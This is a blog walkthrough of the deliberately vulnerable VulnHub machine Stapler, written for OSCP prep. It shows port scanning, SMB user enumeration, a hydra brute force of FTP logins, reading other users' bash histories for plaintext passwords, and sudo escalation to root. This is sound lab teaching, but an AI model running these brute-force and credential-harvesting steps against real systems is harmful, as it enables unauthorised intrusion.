Analytify (Bug): cURL error 77: error setting certificate verify locations: CAfile: /etc/nginx/ssl/cacert.pem CApath: /etc/ssl/certs (see https://curl.haxx.se/libcurl/c/libcurl-errors.html) for https://oauth2.googleapis.com/token Stapler Walkthrough (OSCP Prep) - c0dedead.io

Stapler Walkthrough (OSCP Prep)

Stapler Walkthrough (OSCP Prep)

Introduction

The Stapler 1 virtual machine was released on VulnHub in 2016. Authored by g0tmi1k, this is a very simple machine which can be rooted easily within a short time, at least by taking one of the multiple paths.

In this post, we’ll go over Stapler from boot to root.

Description

+---------------------------------------------------------+
|                                                         |
|                                  __..--''\              |
|                          __..--''         \             |
|                  __..--''          __..--''             |
|          __..--''          __..--''       |             |
|          \ o        __..--''____....----""              |
|           \__..--''\                                    |
|           |         \                                   |
|          +----------------------------------+           |
|          +----------------------------------+           |
|                                                         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|   Name: Stapler           |          IP: DHCP           |
|   Date: 2016-June-08      |        Goal: Get Root!      |
| Author: g0tmi1k           | Difficultly: ??? ;)         |
+- - - - - - - - - - - - - -|- - - - - - - - - - - - - - -+
|                                                         |
| + Average beginner/intermediate VM, only a few twists   |
|   + May find it easy/hard (depends on YOUR background)  |
|   + ...also which way you attack the box                |
|                                                         |
| + It SHOULD work on both VMware and Virtualbox          |
|   + REBOOT the VM if you CHANGE network modes           |
|   + Fusion users, you'll need to retry when importing   |
|                                                         |
| + There are multiple methods to-do this machine         |
|   + At least two (2) paths to get a limited shell       |
|   + At least three (3) ways to get a root access        |
|                                                         |
| + Made for BsidesLondon 2016                            |
|   + Slides: https://download.vulnhub.com/media/stapler/ |
|                                                         |
| + Thanks g0tmi1k, nullmode, rasta_mouse & superkojiman  |
|   + ...and shout-outs to the VulnHub-CTF Team =)        |
|                                                         |
+- - - - - - - - - - - - - - - - - - - - - - - - - - - - -+
|                                                         |
|       --[[~~Enjoy. Have fun. Happy Hacking.~~]]--       |
|                                                         |
+---------------------------------------------------------+

Before We Begin

The Stapler VM comes as an OVF image that must be imported into your hypervisor. Unfortunately, you may get some errors trying to import the OVF file into a newer version of VMWare.

VMWare fails to import Stapler.ovf

To fix this, open the .ovf file in a text editor, and replace all occurrences of the word Caption with ElementNam. Then remove the .mf file in the same directory. Check out this Reddit post for more details.

Now we can import the virtual machine into VMWare. Change the network configuration, create a snapshot, and we’re ready to go.

Tools

Host Discovery

Let’s find the IP address of the Stapler box with arp-scan:

┌──(ori0n㉿kali)-[~/stapler]
└─$ sudo arp-scan -l
[sudo] password for ori0n:
Interface: eth0, type: EN10MB, MAC: 00:0c:29:e2:a7:d8, IPv4: 10.0.10.10
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan)
10.0.10.1       00:50:56:c0:00:08       VMware, Inc.
10.0.10.2       00:50:56:fb:3b:27       VMware, Inc.
10.0.10.101     00:0c:29:60:54:c7       VMware, Inc.
10.0.10.199     00:50:56:e7:f8:fb       VMware, Inc.

4 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.000 seconds (128.00 hosts/sec). 4 respondedjj

So it’s on the network at address 10.0.10.101. I’ll update /etc/hosts to create an alias:

10.0.10.101     stapler

Scanning

We’ll use rustscan to look for open ports and perform an nmap version scan.

┌──(ori0n㉿kali)-[~/stapler]
└─$ rustscan -a stapler --  -sV
.----. .-. .-. .----..---.  .----. .---.   .--.  .-. .-.
| {}  }| { } |{ {__ {_   _}{ {__  /  ___} / {} \ |  `| |
| .-. \| {_} |.-._} } | |  .-._} }\     }/  /\  \| |\  |
`-' `-'`-----'`----'  `-'  `----'  `---' `-'  `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: https://discord.gg/GFrQsGy           :
: https://github.com/RustScan/RustScan :
 --------------------------------------
Please contribute more quotes to our GitHub https://github.com/rustscan/rustscan

[~] The config file is expected to be at "/home/ori0n/.rustscan.toml"
[~] Automatically increasing ulimit value to 5000.
Open 10.0.10.101:21
Open 10.0.10.101:53
Open 10.0.10.101:80
Open 10.0.10.101:139
Open 10.0.10.101:666
Open 10.0.10.101:3306
Open 10.0.10.101:22
Open 10.0.10.101:12380
[~] Starting Script(s)
[>] Script to be run Some("nmap -vvv -p {{port}} {{ip}}")

[~] Starting Nmap 7.91 ( https://nmap.org ) at 2021-08-06 19:27 CDT
NSE: Loaded 45 scripts for scanning.
Initiating Ping Scan at 19:27
Scanning 10.0.10.101 [2 ports]
Completed Ping Scan at 19:27, 0.00s elapsed (1 total hosts)
Initiating Connect Scan at 19:27
Scanning stapler (10.0.10.101) [8 ports]
Discovered open port 3306/tcp on 10.0.10.101
Discovered open port 53/tcp on 10.0.10.101
Discovered open port 80/tcp on 10.0.10.101
Discovered open port 22/tcp on 10.0.10.101
Discovered open port 139/tcp on 10.0.10.101
Discovered open port 21/tcp on 10.0.10.101
Discovered open port 12380/tcp on 10.0.10.101
Discovered open port 666/tcp on 10.0.10.101
Completed Connect Scan at 19:27, 0.00s elapsed (8 total ports)
Initiating Service scan at 19:27
Scanning 8 services on stapler (10.0.10.101)
Completed Service scan at 19:27, 11.04s elapsed (8 services on 1 host)
NSE: Script scanning 10.0.10.101.
NSE: Starting runlevel 1 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.10s elapsed
NSE: Starting runlevel 2 (of 2) scan.
Initiating NSE at 19:27
Completed NSE at 19:27, 0.01s elapsed
Nmap scan report for stapler (10.0.10.101)
Host is up, received syn-ack (0.00072s latency).
Scanned at 2021-08-06 19:27:17 CDT for 11s

PORT      STATE SERVICE     REASON  VERSION
21/tcp    open  ftp         syn-ack vsftpd 2.0.8 or later
22/tcp    open  ssh         syn-ack OpenSSH 7.2p2 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
53/tcp    open  domain      syn-ack dnsmasq 2.75
80/tcp    open  http        syn-ack PHP cli server 5.5 or later
139/tcp   open  netbios-ssn syn-ack Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
666/tcp   open  tcpwrapped  syn-ack
3306/tcp  open  mysql       syn-ack MySQL 5.7.12-0ubuntu1
12380/tcp open  http        syn-ack Apache httpd 2.4.18 ((Ubuntu))
Service Info: Host: RED; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.85 seconds

There is quite a lot going on here. We’ll start with the uncommon ports.

Enumerating Port 12380 (HTTP)

The 12380 port looks interesting. It appears to be running a web server, so open up a web browser and head to http://stapler:12380.

Web server on port 12380

Not much here. Checking the source, there are a couple of comments of interest:

<!-- A message from the head of our HR department, Zoe, if you are looking at this, we want to hire you! -->
<!--    Change the image source '/images/default.jpg' with your favourite image.     -->

So we have a potential username, Zoe, and maybe an /images directory to enumerate. Trying to get to http://stapler:12380/images/ simply redirects to the index page, however. In fact, it seems all URLs on this port redirect to the index page. We’ll move on for now.

Port 666

We also see something running on port 666. We can use netcat to see if we can figure out what’s running there:

┌──(ori0n㉿kali)-[~/stapler]
└─$ nc stapler 666
PdHp,2
      message2.jpgUT    +QWJQWux
                                z
                                 TPA@ UTT2>RDKJj"DL[E
                                                     0<ĴʮnVWH
_dr9uYoXY2e=y}a>` :y^sC

...

And we get a bunch of gibberish. It appears to be binary data, but we can see the string “message2.jpg” buried within. Let’s try to pipe this data into a file for a deeper look.

Trying to connect back to the same port right away will immediately drop the connection, so we can add a sleep command to wait some time before reconnecting. Then we’ll see if the file command can determine the data type of the file.

┌──(ori0n㉿kali)-[~/stapler]
└─$ sleep 60; nc stapler  666 > data
^C

┌──(ori0n㉿kali)-[~/stapler]
└─$ file data
data: Zip archive data, at least v2.0 to extract

┌──(ori0n㉿kali)-[~/stapler]
└─$ mv data data.zip; unzip data.zip
Archive:  data.zip
  inflating: message2.jpg

It looks like a Zip file. After unpacking, we find a JPG image. That would explain the message2.jpg string we saw buried in the data. Let’s see if it gives us anything useful.

message2.jpg

We get another potential username and a segmentation fault error message. Perhaps this is a clue for later on in the box. Or perhaps g0tmi1k is trolling us and this is just a rabbit hole.

Enumerating Port 139 (smbd)

SMB is often a good place to find information and/or exploitable security holes. Let’s check it out.

For starters, run enum4linux. Within the sea of text, we can find a long list of usernames.

┌──(ori0n㉿kali)-[~/stapler]
└─$ enum4linux -a stapler
Starting enum4linux v0.8.9 ( http://labs.portcullis.co.uk/application/enum4linux/ ) on Fri Aug  6 19:57
:54 2021

...


[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\peter (Local User)
S-1-22-1-1001 Unix User\RNunemaker (Local User)
S-1-22-1-1002 Unix User\ETollefson (Local User)
S-1-22-1-1003 Unix User\DSwanger (Local User)
S-1-22-1-1004 Unix User\AParnell (Local User)
S-1-22-1-1005 Unix User\SHayslett (Local User)
S-1-22-1-1006 Unix User\MBassin (Local User)
S-1-22-1-1007 Unix User\JBare (Local User)
S-1-22-1-1008 Unix User\LSolum (Local User)
S-1-22-1-1009 Unix User\IChadwick (Local User)
S-1-22-1-1010 Unix User\MFrei (Local User)
S-1-22-1-1011 Unix User\SStroud (Local User)
S-1-22-1-1012 Unix User\CCeaser (Local User)
S-1-22-1-1013 Unix User\JKanode (Local User)
S-1-22-1-1014 Unix User\CJoo (Local User)
S-1-22-1-1015 Unix User\Eeth (Local User)
S-1-22-1-1016 Unix User\LSolum2 (Local User)
S-1-22-1-1017 Unix User\JLipps (Local User)
S-1-22-1-1018 Unix User\jamie (Local User)
S-1-22-1-1019 Unix User\Sam (Local User)
S-1-22-1-1020 Unix User\Drew (Local User)
S-1-22-1-1021 Unix User\jess (Local User)
S-1-22-1-1022 Unix User\SHAY (Local User)
S-1-22-1-1023 Unix User\Taylor (Local User)
S-1-22-1-1024 Unix User\mel (Local User)
S-1-22-1-1025 Unix User\kai (Local User)
S-1-22-1-1026 Unix User\zoe (Local User)
S-1-22-1-1027 Unix User\NATHAN (Local User)
S-1-22-1-1028 Unix User\www (Local User)
S-1-22-1-1029 Unix User\elly (Local User)

...

Copy these usernames to a file called users.txt. These will definitely come in handy.

Brute Forcing with Hydra

With this list of usernames, we can attempt to crack some passwords. Because it isn’t uncommon for users to use their usernames as their passwords as well, let’s try a quick brute force with hydra.

Because brute-forcing SSH is painfully slow, we’ll try cracking the FTP server first:

┌──(ori0n㉿kali)-[~/stapler]
└─$ hydra -L users.txt -P users.txt stapler ftp
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-08-06 20:03:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 900 login tries (l:30/p:30), ~57 tries per task
[DATA] attacking ftp://stapler:21/
[21][ftp] host: stapler   login: SHayslett   password: SHayslett

After only a minute or two, we have a hit. I’ll leave this running and see what I can do with these creds.

Getting In and a Quick Privesc

Try to SSH in with the cracked credentials:

┌──(ori0n㉿kali)-[~/stapler]
└─$ ssh SHayslett@stapler
-----------------------------------------------------------------
~          Barry, don't forget to put a message here           ~
-----------------------------------------------------------------
SHayslett@stapler's password:
Welcome back!



The programs included with the Ubuntu system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
applicable law.

SHayslett@red:~$

And we’re in! First, let’s check out our privileges:

SHayslett@red:~$ sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for SHayslett:
Sorry, user SHayslett may not run sudo on red.

No luck with sudo. Digging through the home directories often uncovers diamonds. Let’s look for readable files:

SHayslett@red:~$ find /home -readable
/home
/home/MFrei
/home/MFrei/.bashrc
/home/MFrei/.bash_history
/home/MFrei/.bash_logout
/home/MFrei/.profile
/home/Sam
/home/Sam/.bashrc
/home/Sam/.bash_history
/home/Sam/.bash_logout
/home/Sam/.profile
/home/CCeaser
/home/CCeaser/.bashrc
/home/CCeaser/.bash_history
/home/CCeaser/.bash_logout
/home/CCeaser/.profile
/home/www
/home/www/.bashrc
/home/www/.bash_logout
/home/www/.profile
/home/DSwanger
/home/DSwanger/.bashrc
/home/DSwanger/.bash_history
/home/DSwanger/.bash_logout
/home/DSwanger/.profile

...

So there are a whole lot of readable files. The .bash_history files might provide something we can use, so let’s use a bit of command-line fu to dump them:

SHayslett@red:~$ find /home -name .bash_history -exec cat {} \;
exit
exit
free
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
exit
top
ps aux
exit
exit
id
cat: /home/peter/.bash_history: Permission denied
find: ‘/home/peter/.cache’: Permission denied
exit
id
whoami
ls -lah
pwd
ps aux
sshpass -p thisimypassword ssh JKanode@localhost
apt-get install sshpass
sshpass -p JZQuyIN5 peter@localhost
ps -ef
top
kill -9 3747
exit
exit
exit
exit
exit
exit
exit
exit
exit
whoami
exit
exit
exit
top
exit

We get more creds!

We can use the id command to see if either of these users is likely to have significant privileges on the box.

SHayslett@red:~$ id JKanode
uid=1013(JKanode) gid=1013(JKanode) groups=1013(JKanode)
SHayslett@red:~$ id peter
uid=1000(peter) gid=1000(peter) groups=1000(peter),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare)

Hey Peter, man, what you got for us?

Root

Head over to Peter’s account and see what sudo can do for you.

SHayslett@red:~$ su peter
Password:
This is the Z Shell configuration function for new users,
zsh-newuser-install.
You are seeing this message because you have no zsh startup files
(the files .zshenv, .zprofile, .zshrc, .zlogin in the directory
~).  This function can help you with a few settings that should
make your use of the shell easier.

You can:

(q)  Quit and do nothing.  The function will be run again next time.

(0)  Exit, creating the file ~/.zshrc containing just a comment.
     That will prevent this function being run again.

(1)  Continue to the main menu.

(2)  Populate your ~/.zshrc with the configuration recommended
     by the system administrator and exit (you will need to edit
     the file by hand, if so desired).

--- Type one of the keys in parentheses --- q
red% sudo -l

We trust you have received the usual lecture from the local System
Administrator. It usually boils down to these three things:

    #1) Respect the privacy of others.
    #2) Think before you type.
    #3) With great power comes great responsibility.

[sudo] password for peter:
Matching Defaults entries for peter on red:
    lecture=always, env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User peter may run the following commands on red:
    (ALL : ALL) ALL

Piece of cake! Let’s get our root shell:

red% sudo -s
red# id
uid=0(root) gid=0(root) groups=0(root)

Get the Flag

Capturing the flag on this box is simple. Head over to the /root directory. We find flag.txt and cat it out:

red# cd /root
red# ls -l
total 72
-rwxr-xr-x 1 root root  1090 Jun  5  2016 fix-wordpress.sh
-rw-r--r-- 1 root root   463 Jun  5  2016 flag.txt
-rw-r--r-- 1 root root   345 Jun  5  2016 issue
-rwxr-xr-x 1 root root   103 Jun  5  2016 python.sh
-rw-r--r-- 1 root root 54405 Jun  5  2016 wordpress.sql
red# cat flag.txt
~~~~~~~~~~<(Congratulations)>~~~~~~~~~~
                          .-'''''-.
                          |'-----'|
                          |-.....-|
                          |       |
                          |       |
         _,._             |       |
    __.o`   o`"-.         |       |
 .-O o `"-.o   O )_,._    |       |
( o   O  o )--.-"`O   o"-.`'-----'`
 '--------'  (   o  O    o)
              `----------`
b6b545dc11b7a270f4bad23432190c75162c4a2b

Wrapping Up

Stapler ended up being a super simple machine with a very quick path to root. According to the readme, there are at least two paths to a foothold and at least three ways to get root. Perhaps we’ll dig deeper into these in the future.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.